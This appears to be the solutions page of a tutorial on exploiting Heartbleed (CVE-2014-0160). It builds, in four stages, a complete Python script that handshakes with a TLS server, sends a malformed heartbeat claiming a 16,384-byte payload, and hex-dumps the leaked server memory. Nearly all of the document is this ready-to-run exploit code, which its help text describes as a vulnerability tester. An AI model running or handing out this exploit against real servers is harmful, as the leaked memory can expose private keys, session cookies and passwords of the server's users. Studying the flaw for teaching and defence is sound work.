=========================================================
Exploiting CVE-2014-0160 Solutions
=========================================================

---------------------------------------------------------
Build Your Command Center
---------------------------------------------------------

.. sourcecode:: python

    import argparse

    # Must be a string: a bare ``0.0.0`` is not a valid Python literal.
    __version__ = '0.0.0'


    def build_argument_parser():
        """Parse the command line and return the resulting namespace.

        Returns:
            argparse.Namespace with ``host`` (str) and ``port`` (int).
        """
        # NOTE(review): the banner's original line breaks/spacing could not be
        # recovered; it is reproduced here character-for-character on one line.
        parser = argparse.ArgumentParser(
            description=f"""
    ██░ ██ ▓█████ ▄▄▄ ██▀███ ▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ ▓██░ ██▒▓█ ▀▒████▄ ▓██ ▒ ██▒▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌ ▒██▀▀██░▒███ ▒██ ▀█▄ ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌ ░▓█ ░██ ▒▓█ ▄░██▄▄▄▄██ ▒██▀▀█▄ ░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌ ░▓█▒░██▓░▒████▒▓█ ▓██▒░██▓ ▒██▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ ▒ ░░▒░▒░░ ▒░ ░▒▒ ▓▒█░░ ▒▓ ░▒▓░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ ▒ ░▒░ ░ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ ░ ░░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
    Version: {__version__}
    """,
            formatter_class=argparse.RawTextHelpFormatter,
        )
        parser.add_argument(
            dest="host",
            help="the host that you wish to test for Heartbleed",
        )
        # nargs="?" makes the positional optional; without it argparse still
        # requires the argument and the default of 443 is never used.
        parser.add_argument(
            dest="port",
            type=int,
            nargs="?",
            default=443,
            help="the port which you wish to test for Heartbleed, default is 443",
        )
        return parser.parse_args()


    if __name__ == '__main__':
        args = build_argument_parser()

---------------------------------------------------------
Handling Sockets
---------------------------------------------------------

..
sourcecode:: python

    import argparse
    import logging
    import socket

    # Must be a string: a bare ``0.0.0`` is not a valid Python literal.
    __version__ = '0.0.0'


    def h2bin(payload: str) -> bytes:
        """Convert a whitespace-separated hex dump into raw bytes."""
        return bytes.fromhex(payload)


    # Pre-built Client Hello record, sent verbatim to start the handshake.
    hello = h2bin('''
    16 03 02 00 dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
    00 0f 00 01 01
    ''')


    def build_argument_parser():
        """Parse the command line and return the resulting namespace.

        Returns:
            argparse.Namespace with ``host`` (str) and ``port`` (int).
        """
        # NOTE(review): the banner's original line breaks/spacing could not be
        # recovered; it is reproduced here character-for-character on one line.
        parser = argparse.ArgumentParser(
            description=f"""
    ██░ ██ ▓█████ ▄▄▄ ██▀███ ▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ ▓██░ ██▒▓█ ▀▒████▄ ▓██ ▒ ██▒▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌ ▒██▀▀██░▒███ ▒██ ▀█▄ ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌ ░▓█ ░██ ▒▓█ ▄░██▄▄▄▄██ ▒██▀▀█▄ ░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌ ░▓█▒░██▓░▒████▒▓█ ▓██▒░██▓ ▒██▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ ▒ ░░▒░▒░░ ▒░ ░▒▒ ▓▒█░░ ▒▓ ░▒▓░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ ▒ ░▒░ ░ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ ░ ░░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
    Version: {__version__}
    """,
            formatter_class=argparse.RawTextHelpFormatter,
        )
        # dest is "host" because main() reads runtime_options.host.
        parser.add_argument(
            dest="host",
            help="the host that you wish to test for Heartbleed",
        )
        # nargs="?" makes the positional optional; without it argparse still
        # requires the argument and the default of 443 is never used.
        parser.add_argument(
            dest="port",
            type=int,
            nargs="?",
            default=443,
            help="the port which you wish to test for Heartbleed, default is 443",
        )
        return parser.parse_args()


    def main(runtime_options: argparse.Namespace):
        """Connect to the target and send the Client Hello.

        Args:
            runtime_options: parsed arguments providing ``host`` and ``port``.
        """
        # The context manager closes the socket on every exit path.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            logging.info('Connecting...')
            sock.connect((runtime_options.host, runtime_options.port))
            logging.info('Sending Client Hello...')
            # sendall() retries until the whole record is written; send() may
            # write only part of it.
            sock.sendall(hello)


    if __name__ == '__main__':
        # The root logger defaults to WARNING; enable INFO so progress shows.
        logging.basicConfig(level=logging.INFO)
        args = build_argument_parser()
        main(args)

---------------------------------------------------------
Waiting for a Response & ``recvall()``
---------------------------------------------------------

.. sourcecode:: python

    import argparse
    import logging
    import socket
    import struct

    import hexdump

    # Must be a string: a bare ``0.0.0`` is not a valid Python literal.
    __version__ = '0.0.0'


    def h2bin(payload: str) -> bytes:
        """Convert a whitespace-separated hex dump into raw bytes."""
        return bytes.fromhex(payload)


    # Pre-built Client Hello record, sent verbatim to start the handshake.
    hello = h2bin('''
    16 03 02 00 dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
    00 0f 00 01 01
    ''')


    def recvall(sock: socket.socket, count: int):
        """Read exactly ``count`` bytes from ``sock``.

        A single recv() may return fewer bytes than requested, so keep
        reading until the full amount has arrived.

        Returns:
            The bytes read, or None if the peer closed the connection first.
        """
        chunks = []
        remaining = count
        while remaining:
            chunk = sock.recv(remaining)
            if not chunk:
                return None
            chunks.append(chunk)
            remaining -= len(chunk)
        return b''.join(chunks)


    def build_argument_parser():
        """Parse the command line and return the resulting namespace.

        Returns:
            argparse.Namespace with ``host`` (str) and ``port`` (int).
        """
        # NOTE(review): the banner's original line breaks/spacing could not be
        # recovered; it is reproduced here character-for-character on one line.
        parser = argparse.ArgumentParser(
            description=f"""
    ██░ ██ ▓█████ ▄▄▄ ██▀███ ▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ ▓██░ ██▒▓█ ▀▒████▄ ▓██ ▒ ██▒▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌ ▒██▀▀██░▒███ ▒██ ▀█▄ ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌ ░▓█ ░██ ▒▓█ ▄░██▄▄▄▄██ ▒██▀▀█▄ ░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌ ░▓█▒░██▓░▒████▒▓█ ▓██▒░██▓ ▒██▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ ▒ ░░▒░▒░░ ▒░ ░▒▒ ▓▒█░░ ▒▓ ░▒▓░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ ▒ ░▒░ ░ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ ░ ░░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
    Version: {__version__}
    """,
            formatter_class=argparse.RawTextHelpFormatter,
        )
        # dest is "host" because main() reads runtime_options.host.
        parser.add_argument(
            dest="host",
            help="the host that you wish to test for Heartbleed",
        )
        # nargs="?" makes the positional optional; without it argparse still
        # requires the argument and the default of 443 is never used.
        parser.add_argument(
            dest="port",
            type=int,
            nargs="?",
            default=443,
            help="the port which you wish to test for Heartbleed, default is 443",
        )
        return parser.parse_args()


    def main(runtime_options: argparse.Namespace):
        """Connect, send the Client Hello and read records until the
        server's handshake is finished.

        Args:
            runtime_options: parsed arguments providing ``host`` and ``port``.
        """
        # The context manager closes the socket on every exit path.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            logging.info('Connecting...')
            sock.connect((runtime_options.host, runtime_options.port))
            logging.info('Sending Client Hello...')
            sock.sendall(hello)

            while True:
                # Each record starts with a 5-byte header:
                # content type (1 byte), version (2 bytes), length (2 bytes).
                header = recvall(sock, 5)
                if header is None:
                    logging.warning('Unexpected EOF receiving record header - server closed connection')
                    return
                content_type, version, length = struct.unpack('>BHH', header)

                handshake = recvall(sock, length)
                if handshake is None:
                    logging.warning('Unexpected EOF receiving record payload - server closed connection')
                    return
                logging.info('Received message: type=%s, ver=%s, length=%s',
                             content_type, version, len(handshake))

                # Content type 22 is a handshake record; a first byte of 0x0E
                # marks the message that ends the server's handshake flight.
                # Slicing keeps an empty record from raising IndexError.
                if content_type == 22 and handshake[:1] == b'\x0e':
                    break

            logging.info('Handshake done...')
            logging.info('Sending heartbeat request with length 4.')


    if __name__ == '__main__':
        # The root logger defaults to WARNING; enable INFO so progress shows.
        logging.basicConfig(level=logging.INFO)
        args = build_argument_parser()
        main(args)

---------------------------------------------------------
Exploiting Heartbleed
---------------------------------------------------------

..
sourcecode:: python

    import argparse
    import logging
    import socket
    import struct

    import hexdump

    __version__ = '0.0.1'

    # Seconds to wait on any socket operation before giving up, so a server
    # that silently ignores the heartbeat cannot hang the script.
    SOCKET_TIMEOUT = 5.0

    # TLS record content types (see RFC 5246 and RFC 6520).
    CONTENT_TYPE_NAMES = {
        20: 'change_cipher_spec',
        21: 'alert',
        22: 'handshake',
        23: 'application_data',
        24: 'heartbeat',
    }


    def h2bin(payload: str) -> bytes:
        """Convert a whitespace-separated hex dump into raw bytes."""
        return bytes.fromhex(payload)


    # Pre-built Client Hello record, sent verbatim to start the handshake.
    hello = h2bin('''
    16 03 02 00 dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
    00 0f 00 01 01
    ''')

    # Explanation of the heartbeat record below:
    #   18    : heartbeat record
    #   03 02 : TLS version
    #   00 03 : record length
    #   01    : heartbeat request
    #   40 00 : claimed payload length, 16 384 bytes
    # See RFC 6520: "The total length of a HeartbeatMessage MUST NOT exceed
    # 2^14". If we entered FF FF (65 535) instead, we would receive 4 packets
    # of 16 384 bytes each.
    heartbeat = h2bin('''
    18 03 02 00 03
    01 40 00
    ''')


    def identify_content_type(content_type_as_int: int) -> str:
        """Return the name of a TLS record content type.

        Returns:
            The name for ``content_type_as_int``, or ``'unknown'`` when the
            value is not one of the known record types.
        """
        return CONTENT_TYPE_NAMES.get(content_type_as_int, 'unknown')


    def hex_dump(payload: bytes):
        """Print ``payload`` as a hex dump grouped 4 characters at a time."""
        print(hexdump.dump(payload, size=4, sep='-'))


    def recvall(sock: socket.socket, count: int):
        """Read exactly ``count`` bytes from ``sock``.

        A single recv() may return fewer bytes than requested, so keep
        reading until the full amount has arrived.

        Returns:
            The bytes read, or None if the peer closed the connection first.
        """
        chunks = []
        remaining = count
        while remaining:
            chunk = sock.recv(remaining)
            if not chunk:
                return None
            chunks.append(chunk)
            remaining -= len(chunk)
        return b''.join(chunks)


    def test_heartbleed(sock: socket.socket) -> bool:
        """Send the malformed heartbeat and inspect the server's reply.

        Args:
            sock: a connected socket on which the handshake has been read.

        Returns:
            True if the server answered with a heartbeat record, False if it
            sent an alert, closed the connection, or did not answer in time.
        """
        # send heartbeat request to the server
        sock.sendall(heartbeat)

        # start listening for the answer from the server
        while True:
            try:
                # First read the 5-byte record header: content_type, version,
                # length (http://wiki.wireshark.org/SSL). recvall() is used
                # because a bare recv(5) may return fewer than 5 bytes.
                content_version_length = recvall(sock, 5)
                if content_version_length is None:
                    logging.warning('Unexpected EOF receiving record header - server closed connection')
                    return False
                content_type, version, length = struct.unpack('>BHH', content_version_length)

                # We can't use sock.recv(length) because the server may split
                # the heartbeat response into several smaller packets.
                payload = recvall(sock, length)
            except socket.timeout:
                logging.warning('No heartbeat response received, server likely not vulnerable')
                return False

            if payload is None:
                logging.warning('Unexpected EOF receiving record payload - server closed connection')
                return False

            # heartbeat content type is 24, see RFC 6520
            if content_type == 24:
                # The dump goes to stdout; no file is written by this script.
                print('Received heartbeat response:')
                hex_dump(payload)
                if len(payload) > 3:
                    logging.critical('Server returned more data than it should - server is vulnerable!')
                else:
                    logging.warning('Server processed malformed heartbeat, but did not return any extra data.')
                return True

            # content type 21 is an alert, i.e. the server reported an error
            if content_type == 21:
                logging.info('Received alert:')
                hex_dump(payload)
                logging.info('Server returned error, likely not vulnerable')
                return False


    def build_argument_parser():
        """Parse the command line and return the resulting namespace.

        Returns:
            argparse.Namespace with ``host`` (str) and ``port`` (int).
        """
        # NOTE(review): the banner's original line breaks/spacing could not be
        # recovered; it is reproduced here character-for-character on one line.
        parser = argparse.ArgumentParser(
            description=f"""
    ██░ ██ ▓█████ ▄▄▄ ██▀███ ▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ ▓██░ ██▒▓█ ▀▒████▄ ▓██ ▒ ██▒▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌ ▒██▀▀██░▒███ ▒██ ▀█▄ ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌ ░▓█ ░██ ▒▓█ ▄░██▄▄▄▄██ ▒██▀▀█▄ ░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌ ░▓█▒░██▓░▒████▒▓█ ▓██▒░██▓ ▒██▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ ▒ ░░▒░▒░░ ▒░ ░▒▒ ▓▒█░░ ▒▓ ░▒▓░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ ▒ ░▒░ ░ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ ░ ░░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
    Version: {__version__}
    """,
            formatter_class=argparse.RawTextHelpFormatter,
        )
        parser.add_argument(
            dest="host",
            help="the host that you wish to test for Heartbleed",
        )
        # nargs="?" makes the positional optional; without it argparse still
        # requires the argument and the default of 443 is never used.
        parser.add_argument(
            dest="port",
            type=int,
            nargs="?",
            default=443,
            help="the port which you wish to test for Heartbleed, default is 443",
        )
        return parser.parse_args()


    def main(runtime_options: argparse.Namespace) -> bool:
        """Connect to the target, read the handshake and run the test.

        Args:
            runtime_options: parsed arguments providing ``host`` and ``port``.

        Returns:
            The result of test_heartbleed(), or False if the handshake could
            not be read to the end.
        """
        # The context manager closes the socket on every exit path.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(SOCKET_TIMEOUT)
            logging.info('Connecting...')
            sock.connect((runtime_options.host, runtime_options.port))
            logging.info('Sending Client Hello...')
            sock.sendall(hello)

            # pass the handshake
            while True:
                try:
                    hdr = recvall(sock, 5)
                    if hdr is None:
                        logging.warning('Unexpected EOF receiving record header - server closed connection')
                        return False
                    content_type, version, length = struct.unpack('>BHH', hdr)
                    hand = recvall(sock, length)
                except socket.timeout:
                    logging.warning('Timed out waiting for the server handshake')
                    return False
                if hand is None:
                    logging.warning('Unexpected EOF receiving record payload - server closed connection')
                    return False
                logging.info(' ... received message: type = %d, ver = %04x, length = %d',
                             content_type, version, len(hand))
                # Look for server hello done message (handshake type 0x0E).
                # NOTE(review): this only inspects the first byte of each
                # record, so it assumes the message arrives in its own record.
                # Slicing keeps an empty record from raising IndexError.
                if content_type == 22 and hand[:1] == b'\x0e':
                    break

            logging.info('Handshake done...')
            logging.info('Sending heartbeat request with length 4:')
            return test_heartbleed(sock)


    if __name__ == '__main__':
        # The root logger defaults to WARNING; enable INFO so progress shows.
        logging.basicConfig(level=logging.INFO)
        args = build_argument_parser()
        main(args)